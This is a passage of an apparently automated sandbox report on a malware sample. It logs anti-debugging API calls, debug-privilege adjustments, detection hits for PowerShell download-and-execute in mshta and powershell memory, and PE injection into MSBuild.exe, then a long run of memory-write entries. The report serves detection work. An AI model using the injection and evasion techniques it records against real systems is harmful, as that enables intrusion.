                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00992622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992622
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009642DE
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00984CE8 mov eax, dword ptr fs:[00000030h]0_2_00984CE8
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0070652B mov eax, dword ptr fs:[00000030h]14_2_0070652B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0070A302 mov eax, dword ptr fs:[00000030h]14_2_0070A302
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_009C0B62
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00992622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00992622
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_0098083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0098083F
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009809D5 SetUnhandledExceptionFilter,0_2_009809D5
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_00980C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00980C21
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Yara detected Powershell download and execute
                                Source: Yara matchFile source: amsi32_824.amsi.csv, type: OTHER
                                Source: Yara matchFile source: amsi64_6476.amsi.csv, type: OTHER
                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7188, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 824, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 556, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6476, type: MEMORYSTR
                                Injects a PE file into a foreign processes
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeMemory written: unknown base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeMemory written: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeMemory written: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe base: 400000 value starts with: 4D5A
                                Writes to foreign memory regions
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0000
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0064
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B00C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B012C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0190
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B01F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0258
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B02BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0320
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0384
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B03E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B044C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B04B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0514
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0578
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B05DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0640
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B06A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0708
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B076C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B07D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0834
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0898
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B08FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0960
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B09C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0A28
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0A8C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0AF0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0B54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0BB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0C1C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0C80
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0CE4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0D48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0DAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0E10
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0E74
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0ED8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0F3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B0FA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1004
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1068
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B10CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1130
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1194
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B11F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B125C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B12C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1324
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1388
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B13EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1450
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B14B4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1518
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B157C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B15E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1644
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B16A8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B170C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1770
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B17D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1838
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B189C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1900
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1964
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B19C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1A2C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1A90
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1AF4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1B58
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1BBC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1C20
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1C84
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1CE8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1D4C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1DB0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1E14
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1E78
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1EDC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1F40
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B1FA4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2008
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B206C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B20D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2134
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2198
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B21FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2260
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B22C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2328
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B238C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B23F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2454
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B24B8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B251C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2580
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B25E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2648
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B26AC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2710
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2774
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B27D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B283C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B28A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2904
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2968
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B29CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2A30
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2A94
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2AF8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2B5C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2BC0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2C24
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2C88
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2CEC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2D50
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2DB4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2E18
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2E7C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2EE0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2F44
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B2FA8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B300C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3070
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B30D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3138
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B319C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3200
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3264
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B32C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B332C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3390
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B33F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3458
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B34BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3520
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3584
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B35E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B364C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B36B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3714
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3778
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B37DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3840
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B38A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3908
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B396C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B39D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3A34
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3A98
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3AFC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3B60
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B3BC4
